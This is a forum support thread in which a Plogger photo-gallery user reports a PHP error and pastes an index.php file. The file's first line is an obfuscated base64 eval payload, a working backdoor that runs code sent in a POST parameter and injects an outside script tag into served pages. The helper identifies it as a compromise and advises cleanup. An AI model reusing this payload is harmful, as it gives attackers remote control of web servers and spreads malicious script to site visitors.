Not signed in (Sign In)

Vanilla 1.1.10 is a product of Lussumo. More Information: Documentation, Community Support.

• CommentAuthorandrewjs18
    • CommentTimeOct 27th 2009

Fatal error: Cannot redeclare y5iw() (previously declared in /home/uglycars/public_html/photo_gallery/index.php(1) : eval()'d code:1) in /home/uglycars/public_html/photo_gallery/plog-load-config.php(1) : eval()'d code on line 1

I haven't changed anything besides adding photos to the gallery last night and it worked fine after doing that...any ideas?
    •  
      CommentAuthorsidtheduck
    • CommentTimeOct 28th 2009

andrewjs18,

Can you post your index.php file? I have no idea what the function y5iw() does and it's definitely not a function in Plogger (so I don't know why it's present in plog-load-config.php either).

<?php eval(base64_decode('aWYoIWlzc2V0KCRodjYxKSl7ZnVuY3Rpb24gaHY2KCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMjFwTFhSeVlYWmxiSE5sY25acFkyVnpMbU52YlM5aWJHbHpjeTl5WldkaGJDMW9ZWEpwZEdGblpTMWphWFI1TG5Ob2RHMXNMbkJvY0NBK1BDOXpZM0pwY0hRKycpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMpO2Vsc2VpZihzdHJwb3MoJHMsJyxhJykpJHMuPSRhO3JldHVybiAkczt9ZnVuY3Rpb24gaHY2MigkYSwkYiwkYywkZCl7Z2xvYmFsICRodjYxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCRodjYxKSljYWxsX3VzZXJfZnVuYygkaHY2MSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKSBhcyAkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdodjYnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2UgJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgnaHY2Jyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JGh2Nmw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ2h2NjInKSkhPSdodjYyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?><?php
    /*
    * Plogger - A web based photo gallery
    * Copyright (C) 2005 Mike Johnson
    * This program is free software; you can redistribute it and/or modify
    * it under the terms of the GNU General Public License as published by
    * the Free Software Foundation; either version 2 of the License, or (at
    * your option) any later version.
    * This program is distributed in the hope that it will be useful, but
    * WITHOUT ANY WARRANTY; without even the implied warranty of
    * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
    * General Public License for more details.
    * You should have received a copy of the GNU General Public License
    * along with this program; if not, write to the Free Software
    * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
    */
    ?>
    <?php require('plogger.php'); ?>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
    <html xml:lang="<?php echo $language; ?>" lang="<?php echo $language; ?>" xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <?php the_plogger_head(); ?>
    </head>

<body>

<?php the_plogger_gallery(); ?>

</body>
    </html>
    •  
      CommentAuthorsidtheduck
    • CommentTimeOct 28th 2009 edited

andrewjs18,

I'm sad to report that it looks like your site has been hacked. You need to remove the first line of PHP code on that page and any other page that has that same script. Also, you should check with your web host to see if they can determine how the site was hacked, change your passwords (mostly FTP), and delete any files that you do not recognize.

Let us know what you find out from your webhost.

If you can backup your entire server, .zip it and email me (either with it attached or a link that I can download it), I would love to see how we can stop this in the future. Please check your permissions on files / folders as well.

I got it back up. I'm running the beta version of the gallery. I'm going to probably upgrade tonight...do you still want a link to download the zip?
    •  
      CommentAuthorsidtheduck

yes, I would still like to download the zip, if possible. I may be able to figure out how the got in and, if it was through Plogger, be able to stop it from happening again.

I emailed you the download link.